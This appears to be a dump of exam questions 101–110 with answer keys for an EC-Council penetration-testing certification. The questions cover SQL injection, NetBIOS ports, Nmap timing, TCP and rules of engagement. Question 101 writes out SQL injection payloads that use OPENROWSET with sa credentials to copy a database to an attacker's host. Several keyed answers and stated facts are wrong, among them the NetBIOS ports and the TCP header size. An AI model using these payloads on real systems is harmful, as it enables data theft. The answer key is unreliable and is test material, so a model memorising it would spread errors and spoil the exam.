EC-COUNCIL EC-COUNCIL Certifications 412-79V10 Questions & Answers

• Question 101:

  A penetration tester tries to transfer the database from the target machine to a different machine. For this, he uses OPENROWSET to link the target database to his own database, replicates the database structure, and transfers the data to his machine by via a connection to the remote machine on port 80.

  The query he used to transfer databases was:

  '; insert into OPENROWSET ('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases ?

  The query he used to transfer table 1 was:

  '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1') select * from database..table1 ?

  What query does he need in order to transfer the column?

  A. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8 0;','select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables ?

  B. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8 0;','select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows ?

  C. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8 0;','select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns ?

  D. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8 0;','select * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns ?

  Correct Answer: C

• Question 102:

  Which of the following are the default ports used by NetBIOS service?

  A. 135, 136, 139, 445

  B. 134, 135, 136, 137

  C. 137, 138, 139, 140

  D. 133, 134, 139, 142

  Correct Answer: A

• Question 103:

  Packet filtering firewalls are usually a part of a router. In a packet filtering firewall, each packet is compared to a set of criteria before it is forwarded. Depending on the packet and the criteria, the firewall can: i)Drop the packet ii)Forward it or send a message to the originator

  

  At which level of the OSI model do the packet filtering firewalls work?

  A. Application layer

  B. Physical layer

  C. Transport layer

  D. Network layer

  Correct Answer: D

  Reference:

  http://books.google.com.pk/books?id=KPjLAyA7HgoCandpg=PA208andlpg=PA208anddq=At+whi ch+level+of

  +the+OSI+model+do+the+packet+filtering+firewalls+workandsource=blandots=zRrb cmY3pjandsig=I3vuS3VA7r3VF8lC6xq_c_r31Mandhl=enandsa=Xandei=wMcfVMetI8HPaNSRgPgDandved=0CC8Q6AEwAg#v

  =onepageandq=At%20which%20level%20of%20the%20OSI%20model%20do%20the%20pa cket%

  20filtering%20firewalls%20workandf=false (packet filters)

• Question 104:

  Timing is an element of port-scanning that can catch one unaware. If scans are taking too long to complete or obvious ports are missing from the scan, various time parameters may need to be adjusted. Which one of the following scanned timing options in NMAP's scan is useful across slow WAN links or to hide the scan?

  A. Paranoid

  B. Sneaky

  C. Polite

  D. Normal

  Correct Answer: C

• Question 105:

  A directory traversal (or path traversal) consists in exploiting insufficient security validation/sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.

  The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code.

  

  To perform a directory traversal attack, which sequence does a pen tester need to follow to manipulate variables of reference files?

  A. dot-dot-slash (../) sequence

  B. Denial-of-Service sequence

  C. Brute force sequence

  D. SQL Injection sequence

  Correct Answer: A

  Reference:

  https://www.cs.ucsb.edu/~vigna/publications/2010_doupe_cova_vigna_dimva10.pdf (pae 7, directory

  traversal)

• Question 106:

  Transmission Control Protocol (TCP) is a connection-oriented four layer protocol. It is responsible for breaking messages into segments, re-assembling them at the destination station, and re-sending. Which one of the following protocols does not use the TCP?

  A. Reverse Address Resolution Protocol (RARP)

  B. HTTP (Hypertext Transfer Protocol)

  C. SMTP (Simple Mail Transfer Protocol)

  D. Telnet

  Correct Answer: A

• Question 107:

  A framework for security analysis is composed of a set of instructions, assumptions, and limitations to analyze and solve security concerns and develop threat free applications. Which of the following frameworks helps an organization in the evaluation of the company's information security with that of the industrial standards?

  A. Microsoft Internet Security Framework

  B. Information System Security Assessment Framework

  C. The IBM Security Framework

  D. Nortell's Unified Security Framework

  Correct Answer: B

• Question 108:

  Which among the following information is not furnished by the Rules of Engagement (ROE) document?

  A. Techniques for data collection from systems upon termination of the test

  B. Techniques for data exclusion from systems upon termination of the test

  C. Details on how data should be transmitted during and after the test

  D. Details on how organizational data is treated throughout and after the test

  Correct Answer: A

• Question 109:

  Transmission control protocol accepts data from a data stream, divides it into chunks, and adds a TCP header creating a TCP segment.

  The TCP header is the first 24 bytes of a TCP segment that contains the parameters and state of an endto-end TCP socket. It is used to track the state of communication between two TCP endpoints.

  For a connection to be established or initialized, the two hosts must synchronize. The synchronization requires each side to send its own initial sequence number and to receive a confirmation of exchange in an acknowledgment (ACK) from the other side

  The below diagram shows the TCP Header format: How many bits is a acknowledgement number?

  

  A. 16 bits

  B. 32 bits

  C. 8 bits

  D. 24 bits

  Correct Answer: B

  Reference: http://en.wikipedia.org/wiki/Transmission_Control_Protocol (acknowledgement number)

• Question 110:

  Black-box testing is a method of software testing that examines the functionality of an application (e.g. what the software does) without peering into its internal structures or workings. Black-box testing is used to detect issues in SQL statements and to detect SQL injection vulnerabilities.

  

  Most commonly, SQL injection vulnerabilities are a result of coding vulnerabilities during the Implementation/Development phase and will likely require code changes.

  Pen testers need to perform this testing during the development phase to find and fix the SQL injection vulnerability.

  What can a pen tester do to detect input sanitization issues?

  A. Send single quotes as the input data to catch instances where the user input is not sanitized

  B. Send double quotes as the input data to catch instances where the user input is not sanitized

  C. Send long strings of junk data, just as you would send strings to detect buffer overruns

  D. Use a right square bracket (the "]" character) as the input data to catch instances where the user input is used as part of a SQL identifier without any input sanitization

  Correct Answer: D